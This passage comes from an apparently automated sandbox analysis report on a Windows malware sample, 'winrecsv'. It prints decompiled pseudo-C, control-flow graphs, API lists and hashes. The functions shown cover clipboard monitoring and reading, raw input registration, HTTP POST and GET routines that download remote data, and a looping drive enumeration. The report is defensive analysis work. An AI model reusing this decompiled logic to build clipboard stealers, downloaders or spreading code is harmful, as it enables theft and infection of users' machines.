                                                                                  • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040D188
                                                                                  • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040D19B
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040D1D4
                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040D20A
                                                                                  • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040D235
                                                                                  • HttpSendRequestA.WININET(00000000,(A,000000FF,00009E34), ref: 0040D25F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040D29E
                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040D2F0
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D321
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D32E
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D33B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                  • String ID: (A$<$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                  • API String ID: 2761394606-712686588
                                                                                  • Opcode ID: f4458c3659dfce4ad640defbef471a0297bca3ecd7cfe5da72ad61fa52f308f1
                                                                                  • Instruction ID: 9d1df4d468acb1d33fa47fc6a9b1e55a6919e6c831fa6972c8ee7f2cc9406756
                                                                                  • Opcode Fuzzy Hash: f4458c3659dfce4ad640defbef471a0297bca3ecd7cfe5da72ad61fa52f308f1
                                                                                  • Instruction Fuzzy Hash: 43511CB59012289BDB26CF94DC54BE973BDAB48705F1081E9B50DA6280D7B8AFC4CF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 429 403db0-403dd2 GetWindowLongW 430 403dd4-403ddb 429->430 431 403df6-403dfd 429->431 432 403de1-403de5 430->432 433 403e67-403e78 IsClipboardFormatAvailable 430->433 434 403e26-403e2c 431->434 435 403dff 431->435 438 403e04-403e21 SetClipboardViewer SetWindowLongW 432->438 439 403de7-403deb 432->439 436 403e83-403e8d IsClipboardFormatAvailable 433->436 437 403e7a-403e81 433->437 441 403e46-403e4a 434->441 442 403e2e-403e44 SetWindowLongW 434->442 440 403fe4-403ffd DefWindowProcA 435->440 444 403e98-403ea2 IsClipboardFormatAvailable 436->444 445 403e8f-403e96 436->445 443 403eab-403eaf 437->443 438->440 446 403df1 439->446 447 403f9d-403fde RegisterRawInputDevices ChangeClipboardChain 439->447 448 403e62 441->448 449 403e4c-403e5c SendMessageA 441->449 442->448 451 403eb5-403ebf OpenClipboard 443->451 452 403f7f-403f83 443->452 444->443 450 403ea4 444->450 445->443 446->440 447->440 448->440 449->448 450->443 451->452 455 403ec5-403ed6 GetClipboardData 451->455 453 403f85-403f95 SendMessageA 452->453 454 403f9b 452->454 453->454 454->440 456 403ed8 455->456 457 403edd-403eee GlobalLock 455->457 456->440 458 403ef0 457->458 459 403ef5-403f06 457->459 458->440 460 403f08-403f0c 459->460 461 403f29-403f3c call 40b570 459->461 463 403f3e-403f4e call 403ce0 460->463 464 403f0e-403f12 460->464 469 403f51-403f65 GlobalUnlock CloseClipboard 461->469 463->469 465 403f14 464->465 466 403f16-403f27 call 403bd0 464->466 465->469 466->469 469->452 473 403f67-403f7c call 403480 call 408fb0 469->473 473->452
                                                                                  C-Code - Quality: 94%
                                                                                  			E00403DB0(struct HWND__* _a4, int _a8, int _a12, struct HWND__* _a16) {
                                                                                  				struct HWND__* _v8;
                                                                                  				int _v12;
                                                                                  				struct HWND__* _v16;
                                                                                  				void* _v20;
                                                                                  				void* _v24;
                                                                                  				short _v26;
                                                                                  				short _v30;
                                                                                  				int _v32;
                                                                                  				short _v34;
                                                                                  				char _v36;
                                                                                  				int _v40;
                                                                                  				int _v44;
                                                                                  				struct HWND__* _t90;
                                                                                  				struct HWND__* _t97;
                                                                                  				struct HWND__* _t98;
                                                                                  				void* _t129;
                                                                                  
                                                                                  				_v8 = GetWindowLongW(_a4, 0xffffffeb);
                                                                                  				_v40 = _a8;
                                                                                  				if(_v40 > 0x308) {
                                                                                  					if(_v40 == 0x30d) {
                                                                                  						if(_a12 != _v8) {
                                                                                  							if(_v8 != 0) {
                                                                                  								SendMessageA(_v8, _a8, _a12, _a16);
                                                                                  							}
                                                                                  						} else {
                                                                                  							_v8 = _a16;
                                                                                  							SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                  						}
                                                                                  						goto L38;
                                                                                  					} else {
                                                                                  						L38:
                                                                                  						return DefWindowProcA(_a4, _a8, _a12, _a16);
                                                                                  					}
                                                                                  				}
                                                                                  				if(_v40 == 0x308) {
                                                                                  					_v12 = 0;
                                                                                  					if(IsClipboardFormatAvailable(0xd) == 0) {
                                                                                  						if(IsClipboardFormatAvailable(1) == 0) {
                                                                                  							if(IsClipboardFormatAvailable(7) != 0) {
                                                                                  								_v12 = 7;
                                                                                  							}
                                                                                  						} else {
                                                                                  							_v12 = 1;
                                                                                  						}
                                                                                  					} else {
                                                                                  						_v12 = 0xd;
                                                                                  					}
                                                                                  					if(_v12 == 0 || OpenClipboard(0) == 0) {
                                                                                  						L34:
                                                                                  						if(_v8 != 0) {
                                                                                  							SendMessageA(_v8, _a8, _a12, _a16);
                                                                                  						}
                                                                                  					} else {
                                                                                  						_v24 = GetClipboardData(_v12);
                                                                                  						if(_v24 != 0) {
                                                                                  							_v20 = GlobalLock(_v24);
                                                                                  							if(_v20 != 0) {
                                                                                  								_v16 = 0;
                                                                                  								_v44 = _v12;
                                                                                  								if(_v44 == 1) {
                                                                                  									_t90 = E0040B570(_v20, 0, 0);
                                                                                  									_t129 = _t129 + 0xc;
                                                                                  									_v16 = _t90;
                                                                                  								} else {
                                                                                  									if(_v44 == 7) {
                                                                                  										_t97 = E00403CE0(_v20, 0, 0);
                                                                                  										_t129 = _t129 + 0xc;
                                                                                  										_v16 = _t97;
                                                                                  									} else {
                                                                                  										if(_v44 == 0xd) {
                                                                                  											_t98 = E00403BD0(_v20, _v20, 0);
                                                                                  											_t129 = _t129 + 8;
                                                                                  											_v16 = _t98;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								GlobalUnlock(_v24);
                                                                                  								CloseClipboard();
                                                                                  								if(_v16 != 0) {
                                                                                  									E00403480(_v16);
                                                                                  									E00408FB0(_v16);
                                                                                  								}
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							goto L38;
                                                                                  						}
                                                                                  					}
                                                                                  					goto L38;
                                                                                  				}
                                                                                  				if(_v40 == 1) {
                                                                                  					_v8 = SetClipboardViewer(_a4);
                                                                                  					SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                  				} else {
                                                                                  					if(_v40 == 2) {
                                                                                  						_v36 = 0;
                                                                                  						_v34 = 0;
                                                                                  						_v30 = 0;
                                                                                  						_v26 = 0;
                                                                                  						_v36 = 1;
                                                                                  						_v34 = 6;
                                                                                  						_v32 = 1;
                                                                                  						__imp__RegisterRawInputDevices( &_v36, 1, 0xc);
                                                                                  						ChangeClipboardChain(_a4, _v8);
                                                                                  					}
                                                                                  				}
                                                                                  				goto L38;
                                                                                  			}

                                                                                  0x00403dc2
                                                                                  0x00403dc8
                                                                                  0x00403dd2
                                                                                  0x00403dfd
                                                                                  0x00403e2c
                                                                                  0x00403e4a
                                                                                  0x00403e5c
                                                                                  0x00403e5c
                                                                                  0x00403e2e
                                                                                  0x00403e31
                                                                                  0x00403e3e
                                                                                  0x00403e3e
                                                                                  0x00000000
                                                                                  0x00403dff
                                                                                  0x00403fe4
                                                                                  0x00403ffd
                                                                                  0x00403ffd
                                                                                  0x00403dfd
                                                                                  0x00403ddb
                                                                                  0x00403e67
                                                                                  0x00403e78
                                                                                  0x00403e8d
                                                                                  0x00403ea2
                                                                                  0x00403ea4
                                                                                  0x00403ea4
                                                                                  0x00403e8f
                                                                                  0x00403e8f
                                                                                  0x00403e8f
                                                                                  0x00403e7a
                                                                                  0x00403e7a
                                                                                  0x00403e7a
                                                                                  0x00403eaf

                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DBC
                                                                                  • SetClipboardViewer.USER32(?), ref: 00403E08
                                                                                  • SetWindowLongW.USER32 ref: 00403E1B
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00403E70
                                                                                  • OpenClipboard.USER32(00000000), ref: 00403EB7
                                                                                  • GetClipboardData.USER32 ref: 00403EC9
                                                                                  • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00403FD0
                                                                                  • ChangeClipboardChain.USER32(?,?), ref: 00403FDE
                                                                                  • DefWindowProcA.USER32(?,?,?,?), ref: 00403FF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                  • String ID:
                                                                                  • API String ID: 3549449529-0
                                                                                  • Opcode ID: f4f9e6eb7439ff84bcf16bc7885a33df19b568e264b9036bfc36b825d851087e
                                                                                  • Instruction ID: 0016380ad0389118889d1cf690c65c1d7a98e8f3a274b3db5f7ad41e70fd50c0
                                                                                  • Opcode Fuzzy Hash: f4f9e6eb7439ff84bcf16bc7885a33df19b568e264b9036bfc36b825d851087e
                                                                                  • Instruction Fuzzy Hash: B3713D75D00209EFDB14DFA4D848BEEBBB8BF48306F14852AF505B6290D7799B40CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 92%
                                                                                  			E0040E480(intOrPtr* __edi) {
                                                                                  				void* __esi;
                                                                                  				void* _t25;
                                                                                  				long _t40;
                                                                                  				intOrPtr* _t53;
                                                                                  				intOrPtr* _t55;
                                                                                  				void* _t56;
                                                                                  				LONG* _t62;
                                                                                  
                                                                                  				_t53 = __edi;
                                                                                  				if(__edi == 0 ||  *__edi != 0x494f4350) {
                                                                                  					return _t25;
                                                                                  				} else {
                                                                                  					_t1 = _t53 + 0x20; // 0x20
                                                                                  					EnterCriticalSection(_t1);
                                                                                  					_t55 =  *((intOrPtr*)(__edi + 0x38));
                                                                                  					if(_t55 == 0) {
                                                                                  						L11:
                                                                                  						_t13 = _t53 + 0x20; // 0x20
                                                                                  						LeaveCriticalSection(_t13);
                                                                                  						SetEvent( *(_t53 + 0x10));
                                                                                  						_t56 = 0;
                                                                                  						if( *((intOrPtr*)(_t53 + 4)) <= 0) {
                                                                                  							L14:
                                                                                  							E0040C040( *((intOrPtr*)(_t53 + 0xc)), 0xffffffff);
                                                                                  							E0040C180( *((intOrPtr*)(_t53 + 0xc)));
                                                                                  							CloseHandle( *(_t53 + 8));
                                                                                  							CloseHandle( *(_t53 + 0x10));
                                                                                  							__imp__WSACloseEvent( *((intOrPtr*)(_t53 + 0x18)));
                                                                                  							E00409940( *((intOrPtr*)(_t53 + 0x14)));
                                                                                  							_t24 = _t53 + 0x20; // 0x20
                                                                                  							DeleteCriticalSection(_t24);
                                                                                  							return E00408FB0(_t53);
                                                                                  						}
                                                                                  						do {
                                                                                  							PostQueuedCompletionStatus( *(_t53 + 8), 0, 0, 0);
                                                                                  							_t56 = _t56 + 1;
                                                                                  						} while (_t56 <  *((intOrPtr*)(_t53 + 4)));
                                                                                  						goto L14;
                                                                                  					} else {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  					do {
                                                                                  						L3:
                                                                                  						if( *_t55 == 0x69636c69) {
                                                                                  							if( *((char*)(_t55 + 0x275)) == 0) {
                                                                                  								_t62 = _t55 + 0x21c;
                                                                                  								_t40 = InterlockedExchangeAdd(_t62, 0);
                                                                                  								if(_t40 == 0) {
                                                                                  									 *(_t55 + 0x230) = _t40;
                                                                                  									 *((intOrPtr*)(_t55 + 0x220)) = 1;
                                                                                  									 *((intOrPtr*)(_t55 + 0x228)) = _t55 + 8;
                                                                                  									 *((intOrPtr*)(_t55 + 0x22c)) = 0x200;
                                                                                  									InterlockedIncrement(_t62);
                                                                                  									if(E0040EAD0(_t55) == 0) {
                                                                                  										InterlockedDecrement(_t62);
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_t55 =  *((intOrPtr*)(_t55 + 0x280));
                                                                                  					} while (_t55 != 0);
                                                                                  					goto L11;
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(00000020,0040BD00,?,0040F024), ref: 0040E49A
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E4C6
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E4DE
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0040E50C
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E51C
                                                                                  • LeaveCriticalSection.KERNEL32(00000020,?,0040F024), ref: 0040E534
                                                                                  • SetEvent.KERNEL32(?,?,0040F024), ref: 0040E53E
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,0040F024), ref: 0040E55B
                                                                                  • CloseHandle.KERNEL32(?,?,?,0040F024), ref: 0040E584
                                                                                  • CloseHandle.KERNEL32(?,?,?,0040F024), ref: 0040E58A
                                                                                  • WSACloseEvent.WS2_32(?), ref: 0040E590
                                                                                  • DeleteCriticalSection.KERNEL32(00000020,?,?,?,0040F024), ref: 0040E5A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                  • String ID: PCOI$ilci
                                                                                  • API String ID: 2403999931-3762367603
                                                                                  • Opcode ID: 8dd6da6e97fa57f1a7193440fcc103113cb784ba75cd11bc1955a2a87b358bb7
                                                                                  • Instruction ID: 93d8e349b18169af685d7a21951132cbb8c9c0fe64a1f5b9dbcdc35934fd6ed3
                                                                                  • Opcode Fuzzy Hash: 8dd6da6e97fa57f1a7193440fcc103113cb784ba75cd11bc1955a2a87b358bb7
                                                                                  • Instruction Fuzzy Hash: D3317475500705BBC710DBB1EC48B97B7A8BF08314F048E2EE95AA3691D778F864CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 68%
                                                                                  			E00404000() {
                                                                                  				struct HWND__* _v8;
                                                                                  				struct tagMSG _v36;
                                                                                  				struct _WNDCLASSEXW _v84;
                                                                                  				short _v596;
                                                                                  				unsigned int _t20;
                                                                                  				void* _t39;
                                                                                  				void* _t40;
                                                                                  
                                                                                  				do {
                                                                                  					_v84.cbSize = 0;
                                                                                  					memset( &(_v84.style), 0, 0x2c);
                                                                                  					_t40 = _t39 + 0xc;
                                                                                  					_v84.cbSize = 0x30;
                                                                                  					_v84.lpfnWndProc = E00403DB0;
                                                                                  					_v84.hInstance = GetModuleHandleW(0);
                                                                                  					_v84.lpszClassName =  &_v596;
                                                                                  					do {
                                                                                  						Sleep(1);
                                                                                  						_t20 = GetTickCount();
                                                                                  						wsprintfW( &_v596, L"%x%X", GetTickCount(), _t20 >> 1);
                                                                                  						_t40 = _t40 + 0x10;
                                                                                  					} while ((RegisterClassExW( &_v84) & 0x0000ffff) == 0);
                                                                                  					_v8 = CreateWindowExW(0, _v84.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v84.hInstance, 0);
                                                                                  					if(_v8 != 0) {
                                                                                  						while(GetMessageA( &_v36, 0, 0, 0) > 0) {
                                                                                  							TranslateMessage( &_v36);
                                                                                  							DispatchMessageA( &_v36);
                                                                                  						}
                                                                                  						goto L7;
                                                                                  					}
                                                                                  					break;
                                                                                  					L7:
                                                                                  				} while (0 != 0);
                                                                                  				ExitThread(0);
                                                                                  			}

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                  • String ID: %x%X$0
                                                                                  • API String ID: 716646876-225668902
                                                                                  • Opcode ID: f6d5b7525540a58df187482176236c9ba1dfeb2eb460690e0bb65cbcf38e7b1f
                                                                                  • Instruction ID: 19d221db94b3e63cef1269c4be0118e099b5cb739eae60d914623c84e45eccf5
                                                                                  • Opcode Fuzzy Hash: f6d5b7525540a58df187482176236c9ba1dfeb2eb460690e0bb65cbcf38e7b1f
                                                                                  • Instruction Fuzzy Hash: 3021F170A40318ABEB109BE0DC49FEE7B78BB44701F508129F705B61D0DBB955448B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 513 40c610-40c6ab memset InternetCrackUrlA InternetOpenA 514 40c6b1-40c6e4 InternetConnectA 513->514 515 40c827-40c830 513->515 516 40c81a-40c821 InternetCloseHandle 514->516 517 40c6ea-40c71a HttpOpenRequestA 514->517 516->515 518 40c720-40c737 HttpSendRequestA 517->518 519 40c80d-40c814 InternetCloseHandle 517->519 520 40c800-40c807 InternetCloseHandle 518->520 521 40c73d-40c741 518->521 519->516 520->519 522 40c7f6 521->522 523 40c747 521->523 522->520 524 40c751-40c758 523->524 525 40c7e9-40c7f4 524->525 526 40c75e-40c780 InternetReadFile 524->526 525->520 527 40c782-40c789 526->527 528 40c78b 526->528 527->528 529 40c78d-40c7e4 call 408ea0 memcpy 527->529 528->525 529->524
                                                                                  C-Code - Quality: 82%
                                                                                  			E0040C610(char* _a4, char** _a8) {
                                                                                  				char _v260;
                                                                                  				char _v772;
                                                                                  				long _v776;
                                                                                  				void* _v780;
                                                                                  				intOrPtr _v792;
                                                                                  				char* _v796;
                                                                                  				signed short _v816;
                                                                                  				intOrPtr _v820;
                                                                                  				char* _v824;
                                                                                  				void _v836;
                                                                                  				void* _v840;
                                                                                  				void* _v844;
                                                                                  				void* _v848;
                                                                                  				char* _v852;
                                                                                  				void _v1876;
                                                                                  				long _v1880;
                                                                                  				void* _t87;
                                                                                  				void* _t91;
                                                                                  				void* _t92;
                                                                                  
                                                                                  				_v776 = 0;
                                                                                  				_v840 = 0;
                                                                                  				memset( &_v836, 0, 0x38);
                                                                                  				_t92 = _t91 + 0xc;
                                                                                  				_v840 = 0x3c;
                                                                                  				_v824 =  &_v260;
                                                                                  				_v820 = 0x100;
                                                                                  				_v796 =  &_v772;
                                                                                  				_v792 = 0x200;
                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                  				_v780 = InternetOpenA(0, 1, 0, 0, 0);
                                                                                  				if(_v780 != 0) {
                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                  					if(_v844 != 0) {
                                                                                  						_v848 = HttpOpenRequestA(_v844, "GET",  &_v772, 0, 0, 0, 0, 0);
                                                                                  						if(_v848 != 0) {
                                                                                  							if(HttpSendRequestA(_v848, 0, 0, 0, 0) != 0) {
                                                                                  								if(_a8 == 0) {
                                                                                  									_v776 = 1;
                                                                                  								} else {
                                                                                  									_v852 = 0;
                                                                                  									while(1 != 0) {
                                                                                  										_t87 = _v848;
                                                                                  										if(InternetReadFile(_v848,  &_v1876, 0x400,  &_v1880) != 0 && _v1880 != 0) {
                                                                                  											_v776 = E00408EA0(_v776, _t87, _v776,  &(_v852[_v1880]));
                                                                                  											memcpy( &(_v852[_v776]),  &_v1876, _v1880);
                                                                                  											_t92 = _t92 + 0x14;
                                                                                  											_v852 =  &(_v852[_v1880]);
                                                                                  											continue;
                                                                                  										}
                                                                                  										break;
                                                                                  									}
                                                                                  									 *_a8 = _v852;
                                                                                  								}
                                                                                  							}
                                                                                  							InternetCloseHandle(_v848);
                                                                                  						}
                                                                                  						InternetCloseHandle(_v844);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v780);
                                                                                  				}
                                                                                  				return _v776;
                                                                                  			}

                                                                                  0x0040c619
                                                                                  0x0040c623
                                                                                  0x0040c638
                                                                                  0x0040c63d
                                                                                  0x0040c640
                                                                                  0x0040c650
                                                                                  0x0040c656
                                                                                  0x0040c666
                                                                                  0x0040c66c
                                                                                  0x0040c688
                                                                                  0x0040c69e
                                                                                  0x0040c6ab
                                                                                  0x0040c6d7
                                                                                  0x0040c6e4
                                                                                  0x0040c70d
                                                                                  0x0040c71a
                                                                                  0x0040c737
                                                                                  0x0040c741
                                                                                  0x0040c7f6
                                                                                  0x0040c747
                                                                                  0x0040c747
                                                                                  0x0040c751
                                                                                  0x0040c771
                                                                                  0x0040c780
                                                                                  0x0040c7a9
                                                                                  0x0040c7ca
                                                                                  0x0040c7cf
                                                                                  0x0040c7de
                                                                                  0x00000000
                                                                                  0x0040c7de
                                                                                  0x00000000
                                                                                  0x0040c780
                                                                                  0x0040c7f2
                                                                                  0x0040c7f2
                                                                                  0x0040c741
                                                                                  0x0040c807
                                                                                  0x0040c807
                                                                                  0x0040c814
                                                                                  0x0040c814
                                                                                  0x0040c821
                                                                                  0x0040c821
                                                                                  0x0040c830

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040C638
                                                                                  • InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040C7CA
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C807
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C814
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C821
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                  • String ID: <$GET
                                                                                  • API String ID: 1205665004-427699995
                                                                                  • Opcode ID: ec5765e5f3d83dd079881a4ae8b9933272d244356d4eee572d68266342c5080b
                                                                                  • Instruction ID: 09436683f8244ffa9c701ea93985ed9ede5934815d9b1926990d38fc667447ad
                                                                                  • Opcode Fuzzy Hash: ec5765e5f3d83dd079881a4ae8b9933272d244356d4eee572d68266342c5080b
                                                                                  • Instruction Fuzzy Hash: 29512C759012289BDB35CB50CC99BD9B3BCAB48705F1081E9E60DAA2C0D7B86FC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 50%
                                                                                  			E004050B0() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				short _v24;
                                                                                  				short _v556;
                                                                                  				short _v2604;
                                                                                  				intOrPtr _v2608;
                                                                                  				union _ULARGE_INTEGER _v2612;
                                                                                  				long _v2616;
                                                                                  				short _v3148;
                                                                                  				intOrPtr _v3152;
                                                                                  				intOrPtr _t34;
                                                                                  				intOrPtr _t38;
                                                                                  				struct %anon54 _t43;
                                                                                  				intOrPtr _t63;
                                                                                  				void* _t68;
                                                                                  				void* _t69;
                                                                                  				void* _t70;
                                                                                  
                                                                                  				Sleep(0x3e8);
                                                                                  				GetModuleFileNameW(0, 0x414418, 0x104);
                                                                                  				_t34 = E0040D530(0x414418);
                                                                                  				_t69 = _t68 + 4;
                                                                                  				 *0x414410 = _t34;
                                                                                  				while(1 != 0) {
                                                                                  					_v8 = E004048C0();
                                                                                  					_v12 = 2;
                                                                                  					while(_v12 <= 0x19) {
                                                                                  						_t38 = E00404860(_v8, _v12,  &_v24);
                                                                                  						_t69 = _t69 + 0xc;
                                                                                  						_v16 = _t38;
                                                                                  						_v3152 = _v16;
                                                                                  						if(_v3152 == 2 || _v3152 == 4) {
                                                                                  							GetVolumeInformationW( &_v24,  &_v3148, 0x105, 0, 0,  &_v2616, 0, 0);
                                                                                  							GetDiskFreeSpaceExW( &_v24, 0,  &_v2612, 0);
                                                                                  							_push(0);
                                                                                  							_push(0x40000000);
                                                                                  							_t63 = _v2608;
                                                                                  							_push(_t63);
                                                                                  							_t43 = _v2612.LowPart;
                                                                                  							_push(_t43);
                                                                                  							L0040F1B0();
                                                                                  							_push(_t63);
                                                                                  							wsprintfW( &_v556, L" (%dGB)", _t43);
                                                                                  							_t70 = _t69 + 0x10;
                                                                                  							if((_v3148 & 0x0000ffff) == 0) {
                                                                                  								wsprintfW( &_v3148, L"Unnamed volume");
                                                                                  								_t70 = _t70 + 8;
                                                                                  							}
                                                                                  							wsprintfW( &_v2604, L"%s%s",  &_v3148,  &_v556);
                                                                                  							E00404BD0( &_v24,  &_v2604, _v2616, ( &_v556 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
                                                                                  							_t69 = _t70 + 0x20;
                                                                                  						}
                                                                                  						_v12 = _v12 + 1;
                                                                                  					}
                                                                                  					Sleep(0x7d0);
                                                                                  				}
                                                                                  				ExitThread(0);
                                                                                  			}

                                                                                  0x004050be
                                                                                  0x004050d0
                                                                                  0x004050db
                                                                                  0x004050e0
                                                                                  0x004050e3
                                                                                  0x004050e8
                                                                                  0x004050fa
                                                                                  0x004050fd
                                                                                  0x0040510f
                                                                                  0x00405125
                                                                                  0x0040512a
                                                                                  0x0040512d
                                                                                  0x00405133
                                                                                  0x00405140
                                                                                  0x0040516f
                                                                                  0x00405184
                                                                                  0x0040518a
                                                                                  0x0040518c
                                                                                  0x00405191
                                                                                  0x00405197
                                                                                  0x00405198
                                                                                  0x0040519e
                                                                                  0x0040519f
                                                                                  0x004051a4
                                                                                  0x004051b2
                                                                                  0x004051b8
                                                                                  0x004051c4
                                                                                  0x004051d2
                                                                                  0x004051d8
                                                                                  0x004051d8
                                                                                  0x004051f5
                                                                                  0x0040521b
                                                                                  0x00405220
                                                                                  0x00405220
                                                                                  0x0040510c
                                                                                  0x0040510c
                                                                                  0x0040522d
                                                                                  0x0040522d
                                                                                  0x0040523a

                                                                                  APIs
                                                                                  • Sleep.KERNEL32(000003E8), ref: 004050BE
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00414418,00000104), ref: 004050D0
